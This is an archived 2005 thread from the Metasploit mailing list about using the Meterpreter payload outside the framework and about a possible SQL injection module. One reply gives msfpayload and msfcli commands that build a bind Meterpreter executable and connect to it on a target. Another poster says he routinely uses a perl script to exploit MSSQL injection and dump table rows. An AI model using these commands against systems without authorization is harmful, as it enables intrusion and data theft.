Metasploit mailing list archives

using Meterpreter , out of MSF // SQL Injection module


From: RaMatkal at hotmail.com (RaMatkal)
Date: Thu, 27 Oct 2005 14:10:24 +0200

I have written a perl script which I regularly use that exploits sites 
vulnerable to SQL injection running MSSQL....

It enumerates the database and is able to write the first 'x' rows of each 
table into .csv files....

Never thought about integrating it into metasploit though....

Let me know if anyone is interested in this...

----- Original Message ----- 
From: "H D Moore" <hdm at metasploit.com>
To: <framework at metasploit.com>
Sent: Wednesday, October 26, 2005 6:11 AM
Subject: Re: [framework] using Meterpreter , out of MSF // SQL Injection module


On Tuesday 25 October 2005 19:07, Hamid . K wrote:
> I was curious, if anyone tried to load meterpreter
> library, out of framework?

The easy way:
$ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe

Copy this executable to the target system and find some way to execute it.
After executing it, you can use the "payload_handler" exploit to connect
and interact with it:
$ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 \
RHOST=<target_system> E

Alternatively, you can use the source code in ./src and just build your
own client/server implementation using it.

> Second;
> Is the idea of adding an automated sql-injection
> module to MSF.

The problem there is that version 2.x is exploit-driven - if you can't use
one of the standard payloads or accomplish a very specific task, then it
means writing a whole library around post-sql-injection remote
compromise. Adding a mysql module means creating payloads for uploading
files or executing commands via the mysql stored procedures (load data
infile, the UDF stuff that abuses blank passwords, etc). If someone came
up with some plausible/useful payloads that would work with generic SQL
injection, I would definitely be interested in integrating it. Version
3.x is going to include "recon" modules, so a generic table enumeration
module would fit into it much better than 2.x.

-HD
